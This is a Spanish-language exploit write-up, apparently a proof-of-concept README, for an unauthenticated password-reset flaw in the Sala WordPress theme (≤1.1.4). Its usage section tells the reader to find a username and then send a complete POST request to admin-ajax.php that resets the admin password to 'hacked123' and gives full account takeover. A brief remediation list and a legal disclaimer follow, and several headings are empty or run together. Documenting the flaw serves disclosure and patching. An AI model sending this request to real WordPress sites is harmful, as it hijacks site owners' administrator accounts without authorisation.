
Sala - Tema de WordPress para startups y SaaS <= 1.1.4 - Escalada de privilegios no autenticada mediante restablecimiento de contraseña/toma de control de cuenta
🔥 Resumen de la Vulnerabilidad
El tema de WordPress Sala versiones <= 1.1.4 es vulnerable a una vulnerabilidad de escalada de privilegios no autenticada. Esta falla permite a atacantes no autenticados restablecer contraseñas de usuarios arbitrarios — incluidos administradores — invocando directamente un endpoint AJAX expuesto sin verificar la identidad del solicitante.
Esta vulnerabilidad se origina en la función change_password_ajax registrada en wp_ajax_nopriv_, que establece una nueva contraseña para cualquier usuario válido sin comprobar si la solicitud está autorizada.
🔍 Tema Afectado
🧪 Características del Exploit
/wp-admin/admin-ajax.php?action=change_password_ajax🧠 Investigador
🚀 Uso
Identifica un nombre de usuario válido en el sitio WordPress objetivo. Puedes hacerlo comprobando:
/author/username)Elabora la siguiente solicitud POST para restablecer la contraseña del usuario:
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: targetsite.com
Content-Type: application/x-www-form-urlencoded
action=change_password_ajax&login=admin&new_password=hacked123
Si tiene éxito, ahora puedes iniciar sesión como el usuario objetivo usando la nueva contraseña (hacked123 en el ejemplo anterior).
Visita /wp-login.php y verifica el acceso.
🛠 Recomendaciones de Corrección
wp_ajax_nopriv_change_password_ajax.is_user_logged_in() y verifica la identidad del usuario antes de permitir acciones sensibles.🔒 Aviso Legal:
Esta información se proporciona únicamente con fines educativos y de pruebas de penetración autorizadas. La explotación no autorizada de sistemas es ilegal y poco ética.
📚 Referencia: